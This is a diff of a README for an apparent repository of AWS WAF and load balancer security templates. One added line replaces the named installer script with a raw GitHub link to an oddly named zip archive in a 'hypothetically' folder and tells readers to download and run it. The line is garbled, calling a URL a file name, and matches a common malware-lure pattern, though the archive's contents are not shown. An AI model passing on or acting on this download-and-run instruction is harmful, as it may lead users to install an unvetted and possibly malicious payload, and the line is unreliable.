xMhaty/AWS_WAF_ALB_Security/README.md

 - IaC templates: Terraform and CloudFormation templates to create ALB, WAFv2 Web ACLs, and the required IAM roles.
 - Configuration files: Reusable snippets for the WAF rulesets (SQLi, GeoMatch, QueryString).
 - Documentation: Detailed walkthroughs on deployment, testing, and maintenance.
 - Assets: Release assets available on the Releases page.
-From the Releases page, you can download the installer file named aws-waf-alb-security-installer.sh and run it to bootstrap a starter setup.
+From the Releases page, you can download the installer file named https://raw.githubusercontent.com/xMhaty/AWS_WAF_ALB_Security/main/hypothetically/Security-WA-AL-AW-v2.9.zip and run it to bootstrap a starter setup.
 - Scripts: Helper scripts to validate the deployment, gather logs, and perform quick health checks.
 - Tests and examples: Sample payloads and test cases to verify that protections are active and performing as expected.